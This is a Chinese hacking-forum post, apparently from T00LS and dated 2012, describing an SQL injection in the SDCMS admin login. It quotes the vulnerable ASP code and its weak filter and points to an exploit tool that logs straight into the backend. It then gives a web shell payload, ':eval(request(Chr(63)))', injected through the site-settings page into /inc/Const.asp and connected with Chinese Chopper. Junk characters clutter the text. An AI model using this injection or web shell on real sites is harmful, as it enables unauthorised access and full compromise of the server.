作者:T00LS 鬼哥* o4 N- ]" B; J; U! I+ X/ K6 C
漏洞文件:后台目录/index.asp
3 D0 p7 X; }2 D; \( P
0 f# L8 l2 i& P- B6 v. xSub Check: X, z) J; ^" |6 e8 o6 e: V6 y
Dim username,password,code,getcode,Rs j/ N/ z4 @* B; G' C
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
; r0 P6 q) W7 u username=FilterText(Trim(Request.Form("username")),1)9 F: S* F9 X1 t: Z/ R4 w. ~6 @
password=FilterText(Trim(Request.Form("password")),1)3 y |9 w; J% _( `$ L0 W) ]
code=Trim(Request.Form("yzm"))2 n$ w/ b. k- X
getcode=Session("SDCMSCode")2 H: ~' C6 {* E3 C3 D& _
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
5 h1 j% M& H0 x2 ` IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied: S( a4 j) o$ B
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied# W5 D9 G' k1 W2 O( i+ o' U8 X! S- W
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied- n( g( K9 d$ O" f/ j
IF username="" or password="" Then
3 \& X" f% u* n _) v, e5 r9 O Echo "用户名或密码不能为空"ied
8 l: s( `% q3 b7 a5 ` Else/ B* i2 j5 D' j9 n9 d
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
/ o4 r! D5 g0 {# @ IF Rs.Eof Then1 B T7 Q) N; ]" k+ P
AddLog username,GetIp,"登录失败",1" ?1 F4 m& J2 C# e* H; R# g
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
5 l8 L8 F3 [5 e" s: O- k Else
7 X. \7 m3 |. N, Q Add_Cookies "sdcms_id",Rs(0)) e' K( F4 ]6 a2 x! g e9 m
Add_Cookies "sdcms_name",username
& _# W M# M3 G/ A Add_Cookies "sdcms_pwd",Rs(2) `6 m! G8 L( k0 B( v
Add_Cookies "sdcms_admin",Rs(3)8 |5 G" X) C5 Y/ q" M# p. ]
Add_Cookies "sdcms_alllever",Rs(4)# X3 m6 r" m0 U6 V9 V
Add_Cookies "sdcms_infolever",Rs(5)
8 @* w9 U* y2 X3 f Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")0 z( S5 o1 B7 E
AddLog username,GetIp,"登录成功",1
, @0 o% O: C0 v& b; \1 ~+ G6 n% R& X '自动删除30天前的Log记录
$ Z4 s7 }1 \7 _ IF Sdcms_DataType Then8 Z$ a8 o$ \# E3 B1 U; t
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
5 V' S; R0 U! q t t3 J7 _- ~' L Else; ^ O) @' a8 c& C! |) w0 n
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
4 e. }) l8 B F6 c7 `* e3 f+ a End IF% S8 f3 _6 i) R/ Q
Go("sdcms_index.asp")
9 e7 Q6 b7 n7 C End IF2 ]0 h7 R8 E7 ^% p; ~. T& P
Rs.Close" a, e. N" k" I2 }$ [4 V9 u) U
Set Rs=Nothing
& g. u* Z8 u% D. O End IF! X! E8 R9 E) j# q9 o! i
End Sub$ P6 n4 K+ F* \' m! M5 ^
8 [3 N* K% {& r+ ~& M’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
% N. a+ F7 Q% ~0 w
' ?# ] i' ^* a8 @! R) vFunction FilterText(ByVal t0,ByVal t1)
' _" y; w* Y' Z6 v( j/ p, v IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
3 g6 ?( O/ x- I" o/ Y1 B t0=Trim(t0)
2 `& f, Z+ d2 C7 v% _" I Select Case t1
7 F) e9 ?& B0 |+ g/ ^ Y' B1 a1 ~ Case "1"! z& t9 w- X/ O6 r0 x' m
t0=Replace(t0,Chr(32),"")7 a2 A+ v5 U* @! D- i
t0=Replace(t0,Chr(13),"")
1 u: C" W) H Z$ e/ I, b/ F( J5 g t0=Replace(t0,Chr(10)&Chr(10),"")
( B7 }3 @/ K( w2 \& N! F t0=Replace(t0,Chr(10),"")
% j$ G H7 P* [1 l! f$ b Case "2"
+ i7 H. D# R- A- e/ N% ]+ _ t0=Replace(t0,Chr(8),"")'回格
5 z |: v) }% X t0=Replace(t0,Chr(9),"")'tab(水平制表符)( S. S2 p4 j( y; a: M4 b( |
t0=Replace(t0,Chr(10),"")'换行1 a- e1 w) {" |$ K
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)2 h/ n. Z# v) |- k! u* w
t0=Replace(t0,Chr(12),"")'换页: A: z) w) `, g; P0 L5 v# ^5 S2 V1 }
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
8 [/ {: s" ^1 o( E9 p3 L- a9 M' y t0=Replace(t0,Chr(22),"")
) \6 @! R$ q2 d! s [, s9 v1 } t0=Replace(t0,Chr(32),"")'空格 SPACE I7 H8 R5 u- m k' E
t0=Replace(t0,Chr(33),"")'!
6 C/ Q+ {8 R6 _. k t0=Replace(t0,Chr(34),"")'"
, y" `) ^3 w3 d! a3 ~. R8 `/ ] t0=Replace(t0,Chr(35),"")'#
% U( s- i8 W0 i# h2 W" @4 T8 e t0=Replace(t0,Chr(36),"")'$
7 x# V; Q1 a: P# I1 A# |4 Q t0=Replace(t0,Chr(37),"")'%; |( W7 X0 N7 R3 P( g2 f
t0=Replace(t0,Chr(38),"")'&
4 S/ m6 Q% |/ Z9 B$ `9 F3 S t0=Replace(t0,Chr(39),"")''
8 b/ q# a/ j6 T: |4 C: ^ t0=Replace(t0,Chr(40),"")'(
" D5 [5 k3 A) ~3 ^9 g6 {) L t0=Replace(t0,Chr(41),"")')6 g3 ?4 \6 I$ W( Y2 c1 t4 j$ t
t0=Replace(t0,Chr(42),"")'*
! q+ o. k8 m: n1 q t0=Replace(t0,Chr(43),"")'+8 z) ]7 \; f0 O' g9 N) s. N4 r+ Y
t0=Replace(t0,Chr(44),"")',. X# }, u$ E' T- T3 Q% \. ^
t0=Replace(t0,Chr(45),"")'-2 X+ _5 @* M) Q7 s. t
t0=Replace(t0,Chr(46),"")'.
7 ]( X6 z# E0 i6 A+ ~2 d+ ^! [# x( W t0=Replace(t0,Chr(47),"")'/5 [5 h, S! f$ s1 t0 U+ U+ {: A
t0=Replace(t0,Chr(58),"")':- \" W+ r, w Y* r, w2 B. b
t0=Replace(t0,Chr(59),"")';
1 [5 f% M! l+ q) \7 s6 o, G t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
4 A0 p) G2 K) V t0=Replace(t0,Chr(63),"")'?
! y; b! ^/ T: B t0=Replace(t0,Chr(64),"")'@/ g& a- _- S# m
t0=Replace(t0,Chr(91),"")'\! H, {3 e8 h) o! }: l
t0=Replace(t0,Chr(92),"")'\
& { G7 {# e0 B6 f6 G; ?; `. r t0=Replace(t0,Chr(93),"")']7 f% u/ p$ A* Q: u/ O( y! E
t0=Replace(t0,Chr(94),"")'^
; f. d2 w0 a9 D( r9 Y% s) X) g t0=Replace(t0,Chr(95),"")'_
& B5 c$ h# H- ^( i9 b# T5 F t0=Replace(t0,Chr(96),"")'`
' j- F# R4 a V6 L" e, u t0=Replace(t0,Chr(123),"")'{5 E9 y$ f* |4 l6 S7 k
t0=Replace(t0,Chr(124),"")'|
1 |' N% a% O/ x2 K8 R! r t0=Replace(t0,Chr(125),"")'}
% }3 {9 B- L$ [+ O- n t0=Replace(t0,Chr(126),"")'~$ p6 N8 B" K/ B$ o& Y/ m
Case Else" O* g! m6 G/ D/ p! @
t0=Replace(t0, "&", "&")
/ ?6 P7 y, H& f3 V. @% m, i t0=Replace(t0, "'", "'")
1 Z! M; U+ l. Q: G- F4 n! O( l t0=Replace(t0, """", """)
0 m5 T' M" ^) \ t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
4 S+ }5 @8 U% ^/ N End Select
* Q% N9 f6 @) j8 M- y$ J2 ~ IF Instr(Lcase(t0),"expression")>0 Then1 G2 E; S/ @+ y& ^
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
. g7 h, d" j) M7 @6 w# G End If
& g, O6 ]1 _$ j# i2 V& P$ u" I FilterText=t0
" g+ p9 R4 ?. e2 cEnd Function; }0 Z- W- p U- v% m
' q- Q6 s1 R; v4 k, |2 V& R3 Z5 [
看到没。直接参数是1 只过滤 A0 ^% V* W; n& R6 t; o
t0=Replace(t0,Chr(32)," ")- `9 h$ [$ F4 b) F' @ k8 S
t0=Replace(t0,Chr(13),"")- e6 W( }- C) z, |, I
t0=Replace(t0,Chr(10)&Chr(10),"
4 Q9 I! k& H c9 ]. R! |5 t")6 [, |9 n. O' k6 I5 D" k- N8 O
t0=Replace(t0,Chr(10),"
3 k9 n0 N% Q& t1 ?& h"), l4 \( q; d, V1 N3 P0 U( T. {# e5 b
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
c# ~/ g! j" O, {1 qEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
" o+ _& j- T f1 D1 u7 c- ~ Y/ u5 a. @" J3 _- G
测试:
) K9 ~2 _3 E! m# b( I5 W: Y# G3 B; w A! y0 a
# @# S' N* O+ r
现在输入工具上验证码,然后点OK
6 J; {7 P+ y8 Y) i+ ]$ e0 z
8 A- t( A r+ u8 g! h. u; g3 D/ N# q4 g- z& @* s
看到我们直接进入后台管理界面了,呵呵!
. e, z% e2 h8 k1 {
( d) C L. Z& a0 \: W: |
& z+ X+ Y' E; K+ L' I/ x, @, T( x2 q) S6 W% D: j8 `* c
这样直接进入后台了。。。。
4 c/ W# m9 R d7 O. K0 `& G+ R6 T( y8 y" g3 l, H1 q
4 S3 H, a" t/ U+ f: D9 R0 I
7 E! J" d3 d$ @/ J1 t$ i2 e! v
SDCMS提权:' u- @4 i9 v6 u# f6 l, G, r
- A5 c9 t. D/ a6 T! ^5 I
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
, e3 \5 @7 h. E1 p: }6 r4 j7 L# H1 z7 a; I) T6 u% p# H
3 w1 {9 L2 m! C& x' U4 a) R+ o
" q% _$ ~! ~. O: q4 wOK,现在用菜刀连接下!1 c( g9 ]$ W' c* U& w! r0 D
1 L5 h u7 U: W8 e, L9 X2 n4 q
6 d0 E6 `4 R; t9 n
5 o+ E K I: D- Y
$ e. u- G) Y Q2 h. g
' q7 O4 A' S* {+ A |
发表于 2012-11-9 20:57:02
收藏
支持
反对